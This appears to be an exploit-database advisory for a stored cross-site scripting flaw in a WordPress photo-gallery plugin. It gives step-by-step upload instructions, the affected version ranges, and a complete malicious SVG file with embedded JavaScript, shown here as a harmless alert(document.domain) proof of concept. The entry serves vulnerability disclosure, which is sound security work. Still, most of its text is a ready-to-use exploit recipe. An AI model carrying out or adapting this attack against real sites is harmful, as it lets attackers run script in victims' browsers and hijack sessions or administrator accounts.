Share
## https://sploitus.com/exploit?id=WPEX-ID:A20A2ECE-6C82-41C6-A21E-95E720F45584
When editing or creating a gallery, Click 'Add Images' then 'Upload Files' and upload a Zip archive containing an SVG file with JavaScript code, then access the uploaded image from the uploads folder directly, e.g https://example.com/wp-content/uploads/photo-gallery/<archive_name>/xss.svg

v < 1.5.75 - SVG at the root/anywhere in the archive
v < 1.5.79 - Put the SVG inside a folder

Example of malicious SVG:
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.domain);</script>
</svg>